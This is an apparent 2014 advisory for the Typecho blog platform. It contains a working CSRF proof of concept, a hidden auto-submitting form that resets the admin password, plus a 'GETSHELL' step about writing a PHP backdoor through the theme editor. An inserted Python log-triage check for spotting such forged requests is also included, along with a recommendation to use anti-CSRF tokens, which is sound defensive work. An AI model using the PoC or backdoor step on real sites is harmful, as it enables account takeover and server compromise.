We enjoy hacking of life in day and night.
_______________________________________________
[+] HSID: FF000-HSDB-0002
[+] Author: Evi1m0 <evi1m0.bat@gmail.com>
[+] Team: FF0000 TEAM <http://www.ff0000.cc>
[+] From: HackerSoul <http://www.hackersoul.com>
[+] Create: 2014-06-22
_______________________________________________

-= Main =-

[*] 1. Description
The change-password form on the http://typecho/admin/profile.php page is vulnerable to CSRF.
From http://typecho/admin/themes.php, a PHP backdoor can be written.

[*] 2. CSRF POC
<div style="display: none;">
  <form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded">
    <input type="hidden" name="password" value="bug1024"/>
    <input type="hidden" name="confirm" value="bug1024" />
    <input name="do" type="hidden" value="password" />
    <button type="submit"></button>
  </form>
</div>
<script>
  setTimeout("document.ff0000team.submit()", 2000);
</script>
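Added example (not part of the original advisory): a log triage check that flags POSTs to the form action used in the PoC when the Referer is missing or points at another host. It assumes combined-format access logs; SITE_HOST reuses the page's placeholder host, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined log format: ip, ident, user, [time], "request", status, size, "referer", ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
ACTION_PATH = "/index.php/action/users-profile"  # form action taken from the PoC
SITE_HOST = "typecho"                            # placeholder host used on the page


def classify(line, site_host=SITE_HOST):
    """Return 'same-site', 'cross-site', 'no-referer', or None if the line is not
    a POST to the profile action."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    if urlsplit(m["path"]).path != ACTION_PATH:   # ignore any query string
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        return "no-referer"                       # may be a Referrer-Policy effect; review
    # Exact host comparison, so "typecho.evil.example" does not pass as "typecho".
    host = urlsplit(referer).hostname
    return "same-site" if host == site_host else "cross-site"


def suspicious(lines, site_host=SITE_HOST):
    """Return (index, verdict) for every line that deserves a closer look."""
    hits = []
    for i, line in enumerate(lines):
        verdict = classify(line, site_host)
        if verdict in ("cross-site", "no-referer"):
            hits.append((i, verdict))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
_REQ = '"POST /index.php/action/users-profile HTTP/1.1" 302 0'
SAMPLE = [
    f'198.51.100.7 - - [22/Jun/2014:10:00:01 +0000] {_REQ} "http://typecho/admin/profile.php" "Mozilla/5.0"',
    f'198.51.100.7 - - [22/Jun/2014:10:05:42 +0000] {_REQ} "http://blog.example.net/post/1" "Mozilla/5.0"',
    f'198.51.100.7 - - [22/Jun/2014:10:09:13 +0000] {_REQ} "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Jun/2014:10:10:00 +0000] "GET /admin/profile.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for index, verdict in suspicious(SAMPLE):
        print(verdict, SAMPLE[index])
```

A hit is a lead for review, not proof of forgery, since browsers can omit the Referer; the durable fix is an anti-CSRF token on the password form.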

[*] 3. GETSHELL
http://typecho/admin/theme-editor.php page, Write backdoor.
Or, Write this: http://www.hackersoul.com/post/PHP中使用按位取反函数创建后门.html

-= END =-